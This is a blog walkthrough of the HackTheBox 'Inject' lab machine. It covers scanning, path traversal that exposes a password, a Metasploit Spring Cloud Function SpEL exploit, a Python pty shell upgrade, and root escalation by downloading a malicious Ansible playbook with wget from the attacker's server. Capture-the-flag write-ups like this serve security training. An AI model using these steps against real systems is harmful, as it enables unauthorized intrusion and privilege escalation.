Inject-HTB Cyber

HackTheBox- Inject

Leave a Comment / Write-ups, HackTheBox / By

Hello folks,

This blog focuses on a machine called “Inject” within the HackTheBox platform. It has been classified as an easy-level challenge. Let’s proceed without any delay and begin the penetration testing process.

Click here to access the Inject Machine.

First of all, let’s start the Inject machine by clicking on “Join Machine”. Scan the obtained IP using our best tool “NMAP”: 

nmap -sV -sC Machine_IP

1.Nmap sV sC


From the above, we can see that only 2 ports are open i.e. 22 (SSH) and 8080 (HTTP). We cannot work on SSH, so let’s try to enumerate further on the HTTP port. Open Firefox and enter http://Machine_IP:8080

2. Website on Browser

We do not have much on the website, so let’s perform directory busting using Gobuster.

gobuster dir -u http://Machine_IP:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html,php -t 50 2>/dev/null

Gobuster

Out of this directory, only Upload has something interesting. Let’s see what we have here.

Upload vulnerability

I have uploaded a jpg image and it is successfully uploaded to the server. This might be vulnerable to File Upload Vulnerability.

Uploaded image

We got another directory path where our image is uploaded and it seems vulnerable to many parameter-related web application vulnerabilities. So let’s penetrate it further…

6. get parameter

Initial Foothold on Inject

I tried exploiting SQL, XSS and Remote file inclusion but they didn’t work here. So I went for Directory Traversal vulnerability aka Path Traversal vulnerability and it worked using Burp Suite. Let me show you how:

directory traversal vulnerability

Wooooo!!! here we got something interesting. There are two secondary users on this machine: Frank and Phil. Let’s try to look into their home directory and see what everything we have there.

8. Frank home dir

There is an interesting hidden directory there. Let’s look into it.

9. Phils password

Yeahhhhh!!! So we got the password for Phil’s user. I tried taking SSH using it but it didn’t work so I checked the configuration file of SSH it shows that we cannot take SSH using Phil. So we need to find another way into the machine.

10. Denyssh for phil

I enumerated further and checked all the important directories where we can get something vulnerable. There is a folder in the web root directory where we get a sensitive file named pom.xml (Project Object Model) which stores configuration details and versions of different frameworks that are used on the web server.

11. Version file

So I tried checking for any vulnerable versions over the internet and got two vulnerabilities discovered in 2022:

Spring Cloud Function SpEL RCE

Spring Framework Class property RCE (Spring4Shell)

I tried both but Spring4Shell was not working. Fortunately, SpEL RCE was working just fine. If you want to read out further please click here.

The Metasploit module name is exploit/multi/http/spring_cloud_function_spel_injection. We need to set RHOSTS and LHOST options and then type exploit as shown below:

12. Foothold

Hurraayyy!!! We got our foothold on the machine as Frank users.
Let’s Spawn our shell with Python3 to make it more interactive

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

Now let’s try to switch our current user to Phil with the password we obtained.
It worked and here is our User.txt file. I respect the policies of HackTheBox and will not show the flag over here.

13


Privilege Escalation on Inject

Now let’s try to escalate our privilege to the root user. I tried many methods but they were not working. So I remembered one directory that I got earlier from directory traversal under /opt. It stored some Ansible files.

14 Ansible dir

So I tried to look for any vulnerability on Ansible automation that might help us escalate our privileges. And here I got one. You can read it by clicking here

We have to create a file with yml extension in the tasks folder with the following content as shown below :

15. Privesc script

Let’s now take this file to our target machine using the Python3 HTTP server with the following command:

python3 –m http.server 7777

Go to the target machine and type the following command to download the file:

wget://Your_Machine_IP:7777/playbook.yml

16. DOwnload yml

Now after a while, just execute the “/bin/bash –p” command to get the root shell. Booommm!!! We successfully penetrated the machine.

17.

Inject is an easy machine by HackTheBox. You can also check out our other write-ups on HackTheBox Machines here.

Happy Pentesting!!!

Team CyberiumX

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top